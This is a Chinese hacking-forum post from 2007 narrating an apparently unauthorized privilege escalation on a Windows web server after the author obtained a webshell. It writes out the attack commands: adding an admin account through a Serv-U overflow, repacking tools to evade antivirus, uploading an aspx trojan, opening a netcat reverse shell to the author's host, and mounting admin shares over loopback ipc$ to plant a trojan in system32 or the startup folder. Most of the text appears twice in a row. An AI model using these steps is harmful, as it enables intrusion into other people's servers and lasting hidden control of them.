小记一次服务器提权
2007-12-20 www.hackbase.com 来源:互联网
我用的是海洋2006,得到webshell后,首先想到的就是提权了,呵呵。
服务器各个目录权限设置得不错
打开"WScript.Shell程序运行器",随便输入一个命令,提示:".. ..
拒绝访问,缺少对象",使用WS组件,输入命令也提示:"拒绝访问",哎~~~
看来有心啊..不过,可以自己上传一个cmd.exe玩玩...还好FSO没有删掉,可以到处逛逛,不过没什么用...
准备开始提权.gogo~~
从"系统服务信息"中,得到对方有serv-u服务,那就用溢出,成功上传了cmd.exe,ftp.exe,新,cmd.exe还在,ftp.exe消失了,可以判断对方服务器中有杀毒软件,然后自己建了一个空的.bat文件,把ftp.exe文件为主和此bat捆绑起来,再加壳,(个人认为这样效果好) 生成另一个ftp.exe,然后上传,新没有被杀,直接执行ftp.exe "net user test test /add" 显示成功,看来确实可以溢出,汗 -
正当得意时,ftp.exe又被杀了。。不过,用如上方法再次上传成功,而且成功添加了管理员,然后再次被杀!无所谓,因为当时想可以用如上方法再次执行命令,不过,发现再也不能上传,一上传就马上被杀!可能杀毒软件变“精”了?上面得到了管理员用户,通过2步自己都觉得纯属侥幸,有点戏剧性
^_^
对方什么也没有开...3389,5631..ai..如果开的话,此提权就已经结束,还是需要自己开..但是上面所说的溢出已经over....
查看"系统用户及用户组信息"突然发现里面有一个asp.net用户,哈哈,希望我所在网站目录可以支持aspx,上传了aspx木马后,随着状态栏一点一点打开,成功载入了,aspx木马可以执行,爽~~~因为此aspx具有users组用户权限,也就是说,可以执行一般可执行文件.
上传nc.exe,本地监听nc.exe -v -l -p 3300,aspx木马中执行nc.exe xxx.xxx.xxx.xxx
3300,进行反向连接,于是本地成功获得了一个具有users权限的cmdshell。
下来的提权可是费了不少时间,不过,最后还是从net start里,发现了有server服务,想了想,我在服务器中有管理员用户和密码,
而且自己正在的是服务器的users组的cmdshell中,
可不可以自己连接自己提权呢...
在cmdshell中输入net use [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/URL]
"test" /user:"test" 提示命令成功. 我晕..爽了..
服务器里只有2个盘,c:\和d:\
c:\为系统盘
d:\为网站所在盘
命令如下:
net use m: [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\c$]\\127.0.0.1\c$[/URL]
net use n: [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\d$]\\127.0.0.1\d$[/URL]
然后把木马上传到网站盘也就是说d:\
那么就在n:\这个映射盘里
通过copy n:\web\xxx\xxx\木马.exe
m:\winnt\system32\下面
也就是把D:\盘的木马copy到了C:\盘下面
也可以copy到启动项中,想怎么玩就怎么玩.因为相于你来说c:\和d:\对你来说是everyone权限..
当时运气差了点,没有计划任务没有启动,所以不能用at.exe定时执行程序....
可能有人要问,为什么不在自己的机器上,直接连接服务器的ipc$呢,:),因为对方有防火墙,根本连不上,如果"自己连自己的话"是没问题的。
服务器各个目录权限设置得不错
打开"WScript.Shell程序运行器",随便输入一个命令,提示:".. ..
拒绝访问,缺少对象",使用WS组件,输入命令也提示:"拒绝访问",哎~~~
看来有心啊..不过,可以自己上传一个cmd.exe玩玩...还好FSO没有删掉,可以到处逛逛,不过没什么用...
准备开始提权.gogo~~
从"系统服务信息"中,得到对方有serv-u服务,那就用溢出,成功上传了cmd.exe,ftp.exe,新,cmd.exe还在,ftp.exe消失了,可以判断对方服务器中有杀毒软件,然后自己建了一个空的.bat文件,把ftp.exe文件为主和此bat捆绑起来,再加壳,(个人认为这样效果好) 生成另一个ftp.exe,然后上传,新没有被杀,直接执行ftp.exe "net user test test /add" 显示成功,看来确实可以溢出,汗 -
正当得意时,ftp.exe又被杀了。。不过,用如上方法再次上传成功,而且成功添加了管理员,然后再次被杀!无所谓,因为当时想可以用如上方法再次执行命令,不过,发现再也不能上传,一上传就马上被杀!可能杀毒软件变“精”了?上面得到了管理员用户,通过2步自己都觉得纯属侥幸,有点戏剧性
^_^
对方什么也没有开...3389,5631..ai..如果开的话,此提权就已经结束,还是需要自己开..但是上面所说的溢出已经over....
查看"系统用户及用户组信息"突然发现里面有一个asp.net用户,哈哈,希望我所在网站目录可以支持aspx,上传了aspx木马后,随着状态栏一点一点打开,成功载入了,aspx木马可以执行,爽~~~因为此aspx具有users组用户权限,也就是说,可以执行一般可执行文件.
上传nc.exe,本地监听nc.exe -v -l -p 3300,aspx木马中执行nc.exe xxx.xxx.xxx.xxx
3300,进行反向连接,于是本地成功获得了一个具有users权限的cmdshell。
下来的提权可是费了不少时间,不过,最后还是从net start里,发现了有server服务,想了想,我在服务器中有管理员用户和密码,
而且自己正在的是服务器的users组的cmdshell中,
可不可以自己连接自己提权呢...
在cmdshell中输入net use [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/URL]
"test" /user:"test" 提示命令成功. 我晕..爽了..
服务器里只有2个盘,c:\和d:\
c:\为系统盘
d:\为网站所在盘
命令如下:
net use m: [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\c$]\\127.0.0.1\c$[/URL]
net use n: [URL=http://www2.3800cc.com/news/w42/file://\\127.0.0.1\d$]\\127.0.0.1\d$[/URL]
然后把木马上传到网站盘也就是说d:\
那么就在n:\这个映射盘里
通过copy n:\web\xxx\xxx\木马.exe
m:\winnt\system32\下面
也就是把D:\盘的木马copy到了C:\盘下面
也可以copy到启动项中,想怎么玩就怎么玩.因为相于你来说c:\和d:\对你来说是everyone权限..
当时运气差了点,没有计划任务没有启动,所以不能用at.exe定时执行程序....
可能有人要问,为什么不在自己的机器上,直接连接服务器的ipc$呢,:),因为对方有防火墙,根本连不上,如果"自己连自己的话"是没问题的。
好了,提权告以段落,这是2个月前的事情了,认为还比较有意思
责任编辑:
本文引用网址:
